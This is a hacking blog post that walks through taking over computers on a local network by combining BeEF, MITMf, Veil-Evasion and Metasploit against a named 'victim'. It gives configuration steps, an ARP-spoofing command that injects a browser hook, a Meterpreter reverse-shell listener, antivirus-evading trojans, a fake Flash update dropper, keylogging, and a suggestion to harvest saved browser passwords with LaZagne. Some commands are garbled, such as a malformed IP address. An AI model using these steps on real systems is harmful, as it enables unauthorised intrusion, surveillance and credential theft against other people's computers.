• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Break into any computer on LAN with Beef + Mitmf + Veil Evasion + Metasploit

AnonyViet by AnonyViet
February 1, 2023
in Security
0

Idea: Beef + Mitmf + Veil Evasion + Metasploit.


Beef: Used to upload the file containing the trojan that Veil Evasion created to the victim’s computer via a web browser


Mitmf is responsible for injecting hook.js to any website when the victim opens any new website.


Mitmf can also inject any trojan file into the victim’s computer when the victim downloads a .zip file to the computer without knowing that the .zip file is infected with the trojan.

Join the channel Telegram of the AnonyViet 👉 Link 👈

Mitmf can also record keystrokes on the victim’s computer when accessing the web browser via jskeylogger


Veil Evasion: create a trojan that bypasses all anti-virus software without being detected running in the background of the victim’s computer. create trojan with IP and PORT of hacker computer.


Metasploit. Always listen at the hacker’s IP and PORT when the victim opens the file containing the trojan, the hacker will break into the victim’s computer and take full control. By using commands in Metasploit. The next series of articles I will guide you to use Metasploit Untimate. To increase the fun and uniqueness, you can combine Lazagne to get the user and password information that the victim has saved on the web browser. ===> self-advocacy added


Prepare:

https://github.com/byt3bl33d3r/MITMf
https://github.com/Veil-Framework/Veil-Evasion

http://beefproject.com/

OS: Kali Linux.

Perform:

1. Config Beef.

CD /usr/share/beef-xss/extensions/metasploit.

vi config.yaml

host: “192.168.1.12”

callback_host: “192.168.1.12”

{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}

cd /usr/share/beef-xss

vi config.yaml

metasploit:
enable: true


Run Beef ./beef

Enter the following address in your browser UI URLs:
http://192.168.1.12:3000/ui/panel user and password default: beef and beef

Run Veil Evasion.

./Veil-Evasion.py


Run Metasploit.

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.12:4444 [*] Starting the payload handler…

Run Mitmf.

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.18 –inject –js-url http://192.168.1.12:3000/hook.js

To make the game more fun and interesting, I searched on the internet for a song with the hacker’s signature style and will play on the victim’s computer through Beef. when i do this my computer will automatically play music without any warning.

Copy the song here.

/usr/share/beef-xss/extensions/demos/html

copy the generated trojan here.

/usr/share/beef-xss/extensions/social_engineering/droppers

/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper

My next idea would be to load a trojan into the victim’s computer via Beef using the Fake Flash Updae feature in Social Engineering.

To do this you need to run the following code:

curl -H “Content-Type: application/json; charset=UTF-8” -d'{“mount”:”/flashplayer.exe”, “local_file”:”/extensions/social_engineering/droppers/flashplayer.exe”}’ -X POST 192.168.1.12.132/api/ server/bind?token=4e0f77f2f2ef98f7fd3cd18aebbf96d75ef051c c

==> I do not explain here you have to do your own research.

Play hacker music on the victim’s computer for the victim to relax a bit Break into any computer on LAN with Beef + Mitmf + Veil Evasion + Metasploit 6


In the end, we successfully break into the victim’s computer and also play music for the victim to listen to. There are many more techniques in this article that I do not publicize because of its dangerous nature. people do their own research and think more Break into any computer in LAN with Beef + Mitmf + Veil Evasion + Metasploit 7

(hackerutudent93 and source from Whitehat.vn)

The article achieved: 5/5 – (100 votes)

Tags: BeefbreakcomputerEvasionLanMetasploitMitmfVeil
Previous Post

Download Pinnacle Studio Ultimate 24- Professional Video Editing

Next Post

Download MindManager 2020 Full – Mind Map drawing software

AnonyViet

AnonyViet

Related Posts

How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Seekr: Collect & manage OSINT data
Security

Seekr: Collect & manage OSINT data

November 22, 2024
Next Post
Download MindManager 2020 Full – Mind Map drawing software

Download MindManager 2020 Full - Mind Map drawing software

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Top 5 game programming languages ​​to learn now

Top 5 game programming languages ​​to learn now

June 8, 2025
The iPhone list is updated with iOS 26

The iPhone list is updated with iOS 26

June 8, 2025
Discover the glowing effect next to the iPhone ios 18 screen

Discover the glowing effect next to the iPhone ios 18 screen

June 8, 2025
[Godot Shooter] #2: Creating characters & shooting bullets

[Godot Shooter] #2: Creating characters & shooting bullets

June 7, 2025
Top 5 game programming languages ​​to learn now

Top 5 game programming languages ​​to learn now

June 8, 2025
The iPhone list is updated with iOS 26

The iPhone list is updated with iOS 26

June 8, 2025
Discover the glowing effect next to the iPhone ios 18 screen

Discover the glowing effect next to the iPhone ios 18 screen

June 8, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Top 5 game programming languages ​​to learn now

Top 5 game programming languages ​​to learn now

June 8, 2025
The iPhone list is updated with iOS 26

The iPhone list is updated with iOS 26

June 8, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET https://kubet88.yoga/ bj88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET https://kubet88.yoga/ bj88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply